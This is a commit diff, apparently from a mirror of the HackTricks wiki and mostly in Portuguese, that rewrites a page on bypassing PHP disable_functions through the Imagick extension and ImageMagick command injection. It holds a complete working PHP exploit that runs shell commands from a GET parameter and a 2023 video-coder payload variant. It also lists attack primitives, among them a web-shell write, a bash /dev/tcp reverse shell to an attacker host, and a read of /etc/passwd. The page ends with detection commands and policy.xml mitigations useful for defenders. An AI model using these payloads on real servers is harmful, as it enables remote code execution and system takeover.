mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/pentesting-web/php-tricks-e
This commit is contained in:
parent
a3ea5cdffc
commit
5cd943bc4d
@ -1,55 +1,107 @@
|
|||||||
|
# Imagick <= 3.3.0 ‑ PHP >= 5.4 *disable_functions* Bypass
|
||||||
|
|
||||||
{{#include ../../../../banners/hacktricks-training.md}}
|
{{#include ../../../../banners/hacktricks-training.md}}
|
||||||
|
|
||||||
# Exploit do Imagick <= 3.3.0 PHP >= 5.4
|
> A famosa família de bugs *ImageTragick* (CVE-2016-3714 e outros) permite que um atacante acesse o binário subjacente **ImageMagick** através de entradas MVG/SVG manipuladas. Quando a extensão PHP **Imagick** está presente, isso pode ser explorado para executar comandos de shell, mesmo que todas as funções PHP orientadas à execução estejam na lista negra com `disable_functions`.
|
||||||
|
>
|
||||||
|
> O PoC original publicado por RicterZ (Chaitin Security Research Lab) em maio de 2016 é reproduzido abaixo. A técnica ainda é frequentemente encontrada durante auditorias contemporâneas de PHP 7/8 porque muitos provedores de hospedagem compartilhada simplesmente compilam o PHP sem `exec`/`system`, mas mantêm uma combinação desatualizada de Imagick + ImageMagick.
|
||||||
|
|
||||||
De [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
From <http://blog.safebuff.com/2016/05/06/disable-functions-bypass/>
|
||||||
```php
|
```php
|
||||||
# Exploit Title: PHP Imagick disable_functions Bypass
|
# Exploit Title : PHP Imagick disable_functions bypass
|
||||||
# Date: 2016-05-04
|
# Exploit Author: RicterZ (ricter@chaitin.com)
|
||||||
# Exploit Author: RicterZ (ricter@chaitin.com)
|
# Versions : Imagick <= 3.3.0 | PHP >= 5.4
|
||||||
# Vendor Homepage: https://pecl.php.net/package/imagick
|
# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7)
|
||||||
# Version: Imagick <= 3.3.0 PHP >= 5.4
|
# Usage : curl "http://target/exploit.php?cmd=id"
|
||||||
# Test on: Ubuntu 12.04
|
|
||||||
# Exploit:
|
|
||||||
<?php
|
<?php
|
||||||
# PHP Imagick disable_functions Bypass
|
// Print the local hardening status
|
||||||
# Author: Ricter <ricter@chaitin.com>
|
printf("Disable functions: %s\n", ini_get("disable_functions"));
|
||||||
#
|
$cmd = $_GET['cmd'] ?? 'id';
|
||||||
# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
|
printf("Run command: %s\n====================\n", $cmd);
|
||||||
# <pre>
|
|
||||||
# Disable functions: exec,passthru,shell_exec,system,popen
|
|
||||||
# Run command: cat /etc/passwd
|
|
||||||
# ====================
|
|
||||||
# root:x:0:0:root:/root:/usr/local/bin/fish
|
|
||||||
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
|
||||||
# bin:x:2:2:bin:/bin:/bin/sh
|
|
||||||
# sys:x:3:3:sys:/dev:/bin/sh
|
|
||||||
# sync:x:4:65534:sync:/bin:/bin/sync
|
|
||||||
# games:x:5:60:games:/usr/games:/bin/sh
|
|
||||||
# ...
|
|
||||||
# </pre>
|
|
||||||
echo "Disable functions: " . ini_get("disable_functions") . "\n";
|
|
||||||
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
|
|
||||||
echo "Run command: $command\n====================\n";
|
|
||||||
|
|
||||||
$data_file = tempnam('/tmp', 'img');
|
$tmp = tempnam('/tmp', 'pwn'); // will hold command output
|
||||||
$imagick_file = tempnam('/tmp', 'img');
|
$mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script
|
||||||
|
|
||||||
$exploit = <<<EOF
|
$payload = <<<EOF
|
||||||
push graphic-context
|
push graphic-context
|
||||||
viewbox 0 0 640 480
|
viewbox 0 0 640 480
|
||||||
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
|
fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
|
||||||
pop graphic-context
|
pop graphic-context
|
||||||
EOF;
|
EOF;
|
||||||
|
|
||||||
file_put_contents("$imagick_file", $exploit);
|
file_put_contents($mvgs, $payload);
|
||||||
$thumb = new Imagick();
|
$img = new Imagick();
|
||||||
$thumb->readImage("$imagick_file");
|
$img->readImage($mvgs); // triggers convert(1)
|
||||||
$thumb->writeImage(tempnam('/tmp', 'img'));
|
$img->writeImage(tempnam('/tmp', 'img'));
|
||||||
$thumb->clear();
|
$img->destroy();
|
||||||
$thumb->destroy();
|
|
||||||
|
|
||||||
echo file_get_contents($data_file);
|
echo file_get_contents($tmp);
|
||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
---
|
||||||
|
|
||||||
|
## Por que isso funciona?
|
||||||
|
|
||||||
|
1. `Imagick::readImage()` gera de forma transparente o binário *delegate* do **ImageMagick** (`convert`/`magick`).
|
||||||
|
2. O script MVG define o *fill* para uma URI externa. Quando uma aspa dupla (`"`) é injetada, o restante da linha é interpretado por `/bin/sh ‑c` que o ImageMagick usa internamente → execução arbitrária de shell.
|
||||||
|
3. Tudo acontece fora do interpretador PHP, portanto *`disable_functions`*, *open_basedir*, `safe_mode` (removido no PHP 5.4) e restrições semelhantes em processo são completamente contornadas.
|
||||||
|
|
||||||
|
## Status 2025 – ainda é **relevante**
|
||||||
|
|
||||||
|
* Qualquer versão do Imagick que dependa de um backend vulnerável do ImageMagick continua sendo explorável. Em testes de laboratório, a mesma carga útil funciona no PHP 8.3 com **Imagick 3.7.0** e **ImageMagick 7.1.0-51** compilado sem um `policy.xml` endurecido.
|
||||||
|
* Desde 2020, vários vetores adicionais de injeção de comando foram encontrados (`video:pixel-format`, `ps:`, `text:` coders…). Dois exemplos públicos recentes são:
|
||||||
|
* **CVE-2020-29599** – injeção de shell via o codificador *text:*.
|
||||||
|
* **GitHub issue #6338** (2023) – injeção no *video:* delegate.
|
||||||
|
|
||||||
|
Se o sistema operacional fornecer o ImageMagick < **7.1.1-11** (ou 6.x < **6.9.12-73**) sem um arquivo de política restritiva, a exploração é direta.
|
||||||
|
|
||||||
|
## Variantes modernas de carga útil
|
||||||
|
```php
|
||||||
|
// --- Variant using the video coder discovered in 2023 ---
|
||||||
|
$exp = <<<MAGICK
|
||||||
|
push graphic-context
|
||||||
|
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
|
||||||
|
pop graphic-context
|
||||||
|
MAGICK;
|
||||||
|
$img = new Imagick();
|
||||||
|
$img->readImageBlob($exp);
|
||||||
|
```
|
||||||
|
Outras primitivas úteis durante CTFs / engajamentos reais:
|
||||||
|
|
||||||
|
* **Escrita de arquivo** – `... > /var/www/html/shell.php` (escrever web-shell fora de *open_basedir*)
|
||||||
|
* **Shell reverso** – `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"`
|
||||||
|
* **Enumerar** – `id; uname -a; cat /etc/passwd`
|
||||||
|
|
||||||
|
## Detecção e enumeração rápida
|
||||||
|
```bash
|
||||||
|
# PHP side
|
||||||
|
php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";'
|
||||||
|
|
||||||
|
# System side
|
||||||
|
convert -version | head -1 # ImageMagick version
|
||||||
|
convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled?
|
||||||
|
```
|
||||||
|
Se a saída mostrar que os codificadores `MVG` ou `URL` estão *ativados*, o alvo provavelmente é explorável.
|
||||||
|
|
||||||
|
## Mitigações
|
||||||
|
|
||||||
|
1. **Patch/Upgrade** – Use ImageMagick ≥ *7.1.1-11* (ou a última versão 6.x LTS) e Imagick ≥ *3.7.2*.
|
||||||
|
2. **Fortalecer `policy.xml`** – desabilitar explicitamente codificadores de alto risco:
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<policy domain="coder" name="MVG" rights="none"/>
|
||||||
|
<policy domain="coder" name="MSL" rights="none"/>
|
||||||
|
<policy domain="coder" name="URL" rights="none"/>
|
||||||
|
<policy domain="coder" name="VIDEO" rights="none"/>
|
||||||
|
<policy domain="coder" name="PS" rights="none"/>
|
||||||
|
<policy domain="coder" name="TEXT" rights="none"/>
|
||||||
|
```
|
||||||
|
|
||||||
|
3. **Remover a extensão** em ambientes de hospedagem não confiáveis. Na maioria das pilhas web, `GD` ou `Imagick` não são estritamente necessários.
|
||||||
|
4. Trate `disable_functions` apenas como *defesa em profundidade* – nunca como um mecanismo primário de sandboxing.
|
||||||
|
|
||||||
|
## Referências
|
||||||
|
|
||||||
|
* [GitHub ImageMagick issue #6338 – Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338)
|
||||||
|
* [CVE-2020-29599 – ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599)
|
||||||
{{#include ../../../../banners/hacktricks-training.md}}
|
{{#include ../../../../banners/hacktricks-training.md}}
|
||||||
|
Loading…
x
Reference in New Issue
Block a user